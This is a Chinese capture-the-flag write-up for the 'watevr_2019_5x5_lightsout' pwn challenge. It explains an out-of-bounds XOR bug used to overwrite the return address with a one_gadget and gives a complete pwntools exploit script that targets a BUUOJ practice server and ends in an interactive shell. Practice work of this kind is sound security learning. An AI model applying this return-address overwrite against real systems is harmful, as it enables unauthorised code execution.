watevr_2019_5x5_lightsout

watevr_2019_5x5_lightsout

watevr_2019_5x5_lightsout_第1张图片

根据这里的越界异或,将返回地址改为one_gadget。其中注意到能够异或的值是有限定的,可以异或(7 << (i - 1))的值,如下

00000011
00000111
00001110
00011100
00111000
01110000
11100000
11000000
10000000
00000000

可以发现,这样值已经可以构造任意的值了。如下exp,是假设存在借位的情况,因此需要一定的概率才能成功

#coding:utf8
from pwn import *

#sh = process('./watevr_2019_5x5_lightsout',env = {'LD_PRELOAD':'./libc-2.27.so'})
sh = remote('node3.buuoj.cn',28016)
sh.sendlineafter('Press enter to run M-x 5x5','')

sh.sendlineafter('Board size (1 to 8)?','1')


sh.sendlineafter('[f  /h/q]:','f 0 50')

sh.sendlineafter('[f  /h/q]:','f 0 49')
sh.sendlineafter('[f  /h/q]:','f 2 49')
sh.sendlineafter('[f  /h/q]:','f 3 49')
sh.sendlineafter('[f  /h/q]:','f 4 49')
sh.sendlineafter('[f  /h/q]:','f 7 49')
sh.sendlineafter('[f  /h/q]:','f 8 49')


sh.sendlineafter('[f  /h/q]:','f 4 48')
sh.sendlineafter('[f  /h/q]:','f 5 48')
sh.sendlineafter('[f  /h/q]:','f 6 48')
sh.sendlineafter('[f  /h/q]:','f 8 48')


sh.sendlineafter('[f  /h/q]:','q')




sh.interactive()

 

你可能感兴趣的:(pwn,二进制漏洞,CTF,安全,PWN,CTF,二进制漏洞,缓冲区溢出)